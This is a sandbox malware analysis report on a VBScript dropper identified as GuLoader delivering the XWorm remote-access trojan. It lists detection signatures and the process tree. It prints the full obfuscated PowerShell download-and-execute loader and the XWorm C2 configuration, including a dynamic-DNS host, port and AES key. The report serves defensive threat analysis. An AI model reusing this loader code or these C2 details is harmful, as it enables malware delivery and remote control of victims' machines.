Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
windows.vbs

Overview

General Information

Sample name:windows.vbs
Analysis ID:1446635
MD5:828b53e8f1faed52722f7b7dd53c8c92
SHA1:f80c8f0bcb94ea38d10e239b203e4e990b649540
SHA256:d0f73c23361be86872a1a87ef43e998a0e1e4fabbd40f5cd86ae333e1a09bdb7
Tags:vbs
Infos:

Detection

GuLoader, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1364 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBalfahu.sol)Pregl ');$Overmuch=$Shadow[0];Handelsmssiges (Tilsynsraads 'Mdele$Trib.gThrallAb teoAnderbWa.fna rudelMinut:SlambS Achtp,lycoeTr,ttkHermauKyurilGerataCossetSem fiKrseloRevoln,verheT.bernKnebnsMetri=lyksaN StateInspiw Rein-PreauOPr kub Gennj,assieStarec Fivet Extr GalloSBaelgyPlje sUnhumtUnshoeUnaffm Kali.B.rtsNMi.abeSpiontAc ou.ConseWFremdeIndflbSkrm.CReb,ll aproiKnutseDelirn,leritRemi ');Handelsmssiges (Tilsynsraads 'Thind$HistrSNonsep ikole CammkStranuDemiulJuic,aUn ect Byg.iJenfooAppeln Ans eScentn.elefsOpera.Ja.ihHEg treTric aGammedBefarePer prInhausYderv[ Drab$ScrofMM.rcueColobl tanl Die,iDestrtPardae elfo].aron= Disk$AnthoTIn.sloPe gen So,riVandlsStjerkprv,pep eudsTilly ');$Suges=Tilsynsraads 'AfregSBramsp LipeeJordvk Pa,luFil,vlnotesaG.debtEnspnisogneoMyc.hnClarieMorgenS,uffsHyper.Ops aDSwineofarvew Pr,tnFremtlPrep.oKompla LanddVr.nsFReintiSereslPhotoeRot r(Pilik$EuropOGlasuvDesaveG.novrAllatmTrisauLdermcA.oophSalva,Stand$ IndoBN.phruWestbb igenaHerpelStileeInt,a)Affyr ';$Suges=$Provisionment[1]+$Suges;$Bubale=$Provisionment[0];Handelsmssiges (Tilsynsraads ' Lvsa$Ska pgUntrel sol.oUdkrsbSrintaVandalDyree:.ylenPCenterAuteciFaggynMycflt G ndeCyli r StivmMatfuaLimitnSammeublystaLaxnelGratasTheop=unt.n(Fj rkTCrypteUnr,ss.ndiatCrean- MoreP PedaaSubartSvrddhHors. Can,l$W.rkmBmilliuTauntboxidia atilUndere Oute)disqu ');while (!$Printermanuals) {Handelsmssiges (Tilsynsraads 'Ankep$ etamgPa lilCo.feoEpithbFysikaMaraglTampo:MulseM DybdaCrip.x RevaiA.putmN.rkoiPoritnCloud= oyol$Bo.dstudelurIn lauSpanse nre ') ;Handelsmssiges $Suges;Handelsmssiges (Tilsynsraads 'SeverSMunketPanoraNothorstvdrtStefa-Om.ilSF,rbilAa yneThyrae MaripTvist Bac,l4 iske ');Handelsmssiges (Tilsynsraads ',egae$KallugAn.iglStikboV,klebHangaaGr,ndlVe tb:WinetP Rod.rBefe.i ,rognostintKs.bleSan,erSkorsmKommaaStoddnFrst,uBere,a Hippl redisTas,e= Inte( FlerT SquaeOverasAnsigt Keci-coeliP Sam a DisktHoneyhAutom Chlor$JunkeBC.lliuMar.ebRhinoaPerf,lSkn,ee Mach)Fr dr ') ;Handelsmssiges (Tilsynsraads ' hodm$FeltdgsatirlJord,o Amphb FarvaDire lPdago:DagskPJuramadigasnRuneitRapereL.totlInduse T ergA.voke SansnFlopheTanha7Blind9Karto=Bur,a$SyncogHaemol No.do.ybvabspeciaKinemlSinte:PatriSLu,esiTrapemSk.nkoPol.enForfaiGaldeaStueecMartyaConcel Tr nlScouryKon.i+ Ford+Bre b%Tripl$ MyceSBetjehAllo,aAcrocdMdereoQu ntwSkvad.Work,c Sd uoScoffuSkelnnTepoytminar ') ;$Overmuch=$Shadow[$Pantelegene79];}$Arkitekttegnes=307942;$sybaritisk=28763;Handelsmssiges (Tilsynsraads 'T.ans$R,allgRoxanl Adreo ophobWi,liaMenthlEnhed:EoghaAV ksetMonteosmokim Javab PyocePrimav KirkbPlissn .kvue AmansSprjt P.eum=Halvg S.favGUdspae Vel.tRa,ca-H glsC Min.o jern .eklt.dehie,ptranAmatrtUnrot Assur$M demB ukkeuAccoubPlumbaUnconlNonareUdskr ');Handelsmssiges (Tilsynsraads 'All m$DancigSa.inlMedlio RepubfjendaN,nsclP,rio:KlavrA Baued SlughMatede Immaselastitri.av,orbueUnb.omGangaeCo,vet,surpeRob.arseams Bipon=om os Belve[FloriSBruteyInconsKommat FleteSaul.mSvikl. TetrCSalmioUd,tynPri.ovva.dleAnsttrSquamtFloss]Maj.s: A,to: AfkrFHjhusr C acoMystimIndtaB CigaaNy,ansTegnfeDehyd6Elfre4SprngS .yketStvdrrMar.viIn.ennWay,lgF,ktu(,rams$jepscAVersitArc,eoCedarm Tyv.bArmcheSu.fav W rtb TorbnPredee M,nusR hei)Micro ');Handelsmssiges (Tilsynsraads 'Selva$TidsrgNephil S,umoTroppbPrepeaD,ivml Bofo:M inmWBe reiNonzoeWrithnNon.eeFatt rArverp Ti slU eclsAt,mkeW.rldn Ond,sSorro deci= Digt Huntl[RenteSP adsy ProdsDdsaatProtaeC,rkumsubar..uffeTIndiveGravexoutp,tHum.e. rhveE,uartnUnb,ncBabasoPoss,dFar.eiS kiynBedimg Phal]Dezym:.nska:Mor.eAHydroSgell,CCabinIb.uttIprofe.EngleGpennae Respt.orurSB,evtt Ved.r.nciniMonofnAmplig,lugt(Foobo$Pa alA UdmudS.akeh Le,eeVikkes Tilsi,enovvServie GlatmHepateForvrt Af reS hisrMili )Irchi ');Handelsmssiges (Tilsynsraads 'Metri$un.ncgNeurolAfsigoTill,b DaniaKa.inlGaffe:mono SSim.lm Smkfi CephtI dhehAntipsDenomoSatisn Radi= Terp$SophiWDeperiKalkpeNonconP ydaePri trHeusepP ranlac.omsidolieTa,rgnLejemsKl.nt. Metas SkiluD,linbSyndrsDepo,t,gehvr ElefiForhanIndekg Exte(Dybfr$ThiouA H,ghrSanerkTilsliDe,astKap ie MakukFla stMyrert,hiaseopbudgKlov,nHexanePoachsO,era,Satur$UrinosOp,luyF.bribInwitaS udsrCacodiGi.gltFrdseiAl essUdplakhelic)Tilsl ');Handelsmssiges $Smithson;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7432 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7588 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBalfahu.sol)Pregl ');$Overmuch=$Shadow[0];Handelsmssiges (Tilsynsraads 'Mdele$Trib.gThrallAb teoAnderbWa.fna rudelMinut:SlambS Achtp,lycoeTr,ttkHermauKyurilGerataCossetSem fiKrseloRevoln,verheT.bernKnebnsMetri=lyksaN StateInspiw Rein-PreauOPr kub Gennj,assieStarec Fivet Extr GalloSBaelgyPlje sUnhumtUnshoeUnaffm Kali.B.rtsNMi.abeSpiontAc ou.ConseWFremdeIndflbSkrm.CReb,ll aproiKnutseDelirn,leritRemi ');Handelsmssiges (Tilsynsraads 'Thind$HistrSNonsep ikole CammkStranuDemiulJuic,aUn ect Byg.iJenfooAppeln Ans eScentn.elefsOpera.Ja.ihHEg treTric aGammedBefarePer prInhausYderv[ Drab$ScrofMM.rcueColobl tanl Die,iDestrtPardae elfo].aron= Disk$AnthoTIn.sloPe gen So,riVandlsStjerkprv,pep eudsTilly ');$Suges=Tilsynsraads 'AfregSBramsp LipeeJordvk Pa,luFil,vlnotesaG.debtEnspnisogneoMyc.hnClarieMorgenS,uffsHyper.Ops aDSwineofarvew Pr,tnFremtlPrep.oKompla LanddVr.nsFReintiSereslPhotoeRot r(Pilik$EuropOGlasuvDesaveG.novrAllatmTrisauLdermcA.oophSalva,Stand$ IndoBN.phruWestbb igenaHerpelStileeInt,a)Affyr ';$Suges=$Provisionment[1]+$Suges;$Bubale=$Provisionment[0];Handelsmssiges (Tilsynsraads ' Lvsa$Ska pgUntrel sol.oUdkrsbSrintaVandalDyree:.ylenPCenterAuteciFaggynMycflt G ndeCyli r StivmMatfuaLimitnSammeublystaLaxnelGratasTheop=unt.n(Fj rkTCrypteUnr,ss.ndiatCrean- MoreP PedaaSubartSvrddhHors. Can,l$W.rkmBmilliuTauntboxidia atilUndere Oute)disqu ');while (!$Printermanuals) {Handelsmssiges (Tilsynsraads 'Ankep$ etamgPa lilCo.feoEpithbFysikaMaraglTampo:MulseM DybdaCrip.x RevaiA.putmN.rkoiPoritnCloud= oyol$Bo.dstudelurIn lauSpanse nre ') ;Handelsmssiges $Suges;Handelsmssiges (Tilsynsraads 'SeverSMunketPanoraNothorstvdrtStefa-Om.ilSF,rbilAa yneThyrae MaripTvist Bac,l4 iske ');Handelsmssiges (Tilsynsraads ',egae$KallugAn.iglStikboV,klebHangaaGr,ndlVe tb:WinetP Rod.rBefe.i ,rognostintKs.bleSan,erSkorsmKommaaStoddnFrst,uBere,a Hippl redisTas,e= Inte( FlerT SquaeOverasAnsigt Keci-coeliP Sam a DisktHoneyhAutom Chlor$JunkeBC.lliuMar.ebRhinoaPerf,lSkn,ee Mach)Fr dr ') ;Handelsmssiges (Tilsynsraads ' hodm$FeltdgsatirlJord,o Amphb FarvaDire lPdago:DagskPJuramadigasnRuneitRapereL.totlInduse T ergA.voke SansnFlopheTanha7Blind9Karto=Bur,a$SyncogHaemol No.do.ybvabspeciaKinemlSinte:PatriSLu,esiTrapemSk.nkoPol.enForfaiGaldeaStueecMartyaConcel Tr nlScouryKon.i+ Ford+Bre b%Tripl$ MyceSBetjehAllo,aAcrocdMdereoQu ntwSkvad.Work,c Sd uoScoffuSkelnnTepoytminar ') ;$Overmuch=$Shadow[$Pantelegene79];}$Arkitekttegnes=307942;$sybaritisk=28763;Handelsmssiges (Tilsynsraads 'T.ans$R,allgRoxanl Adreo ophobWi,liaMenthlEnhed:EoghaAV ksetMonteosmokim Javab PyocePrimav KirkbPlissn .kvue AmansSprjt P.eum=Halvg S.favGUdspae Vel.tRa,ca-H glsC Min.o jern .eklt.dehie,ptranAmatrtUnrot Assur$M demB ukkeuAccoubPlumbaUnconlNonareUdskr ');Handelsmssiges (Tilsynsraads 'All m$DancigSa.inlMedlio RepubfjendaN,nsclP,rio:KlavrA Baued SlughMatede Immaselastitri.av,orbueUnb.omGangaeCo,vet,surpeRob.arseams Bipon=om os Belve[FloriSBruteyInconsKommat FleteSaul.mSvikl. TetrCSalmioUd,tynPri.ovva.dleAnsttrSquamtFloss]Maj.s: A,to: AfkrFHjhusr C acoMystimIndtaB CigaaNy,ansTegnfeDehyd6Elfre4SprngS .yketStvdrrMar.viIn.ennWay,lgF,ktu(,rams$jepscAVersitArc,eoCedarm Tyv.bArmcheSu.fav W rtb TorbnPredee M,nusR hei)Micro ');Handelsmssiges (Tilsynsraads 'Selva$TidsrgNephil S,umoTroppbPrepeaD,ivml Bofo:M inmWBe reiNonzoeWrithnNon.eeFatt rArverp Ti slU eclsAt,mkeW.rldn Ond,sSorro deci= Digt Huntl[RenteSP adsy ProdsDdsaatProtaeC,rkumsubar..uffeTIndiveGravexoutp,tHum.e. rhveE,uartnUnb,ncBabasoPoss,dFar.eiS kiynBedimg Phal]Dezym:.nska:Mor.eAHydroSgell,CCabinIb.uttIprofe.EngleGpennae Respt.orurSB,evtt Ved.r.nciniMonofnAmplig,lugt(Foobo$Pa alA UdmudS.akeh Le,eeVikkes Tilsi,enovvServie GlatmHepateForvrt Af reS hisrMili )Irchi ');Handelsmssiges (Tilsynsraads 'Metri$un.ncgNeurolAfsigoTill,b DaniaKa.inlGaffe:mono SSim.lm Smkfi CephtI dhehAntipsDenomoSatisn Radi= Terp$SophiWDeperiKalkpeNonconP ydaePri trHeusepP ranlac.omsidolieTa,rgnLejemsKl.nt. Metas SkiluD,linbSyndrsDepo,t,gehvr ElefiForhanIndekg Exte(Dybfr$ThiouA H,ghrSanerkTilsliDe,astKap ie MakukFla stMyrert,hiaseopbudgKlov,nHexanePoachsO,era,Satur$UrinosOp,luyF.bribInwitaS udsrCacodiGi.gltFrdseiAl essUdplakhelic)Tilsl ');Handelsmssiges $Smithson;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7744 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 8060 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["rachesxwdavid.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.1850007327.0000000008450000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    0000000D.00000002.1843333872.0000000005723000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        0000000D.00000002.1850717650.0000000008D34000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7308.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_7308.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x1007b:$b2: ::FromBase64String(
              • 0xd427:$s1: -join
              • 0x6bd3:$s4: +=
              • 0x6c95:$s4: +=
              • 0xaebc:$s4: +=
              • 0xcfd9:$s4: +=
              • 0xd2c3:$s4: +=
              • 0xd409:$s4: +=
              • 0xf657:$s4: +=
              • 0xf6d7:$s4: +=
              • 0xf79d:$s4: +=
              • 0xf81d:$s4: +=
              • 0xf9f3:$s4: +=
              • 0xfa77:$s4: +=
              • 0xdb40:$e4: Get-WmiObject
              • 0xdd2f:$e4: Get-Process
              • 0xdd87:$e4: Start-Process
              amsi32_7588.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xffe8:$b2: ::FromBase64String(
              • 0xd427:$s1: -join
              • 0x6bd3:$s4: +=
              • 0x6c95:$s4: +=
              • 0xaebc:$s4: +=
              • 0xcfd9:$s4: +=
              • 0xd2c3:$s4: +=
              • 0xd409:$s4: +=
              • 0xf657:$s4: +=
              • 0xf6d7:$s4: +=
              • 0xf79d:$s4: +=
              • 0xf81d:$s4: +=
              • 0xf9f3:$s4: +=
              • 0xfa77:$s4: +=
              • 0xdb40:$e4: Get-WmiObject
              • 0xdd2f:$e4: Get-Process
              • 0xdd87:$e4: Start-Process
              • 0x17a3b:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", ProcessId: 1364, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", ProcessId: 1364, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F 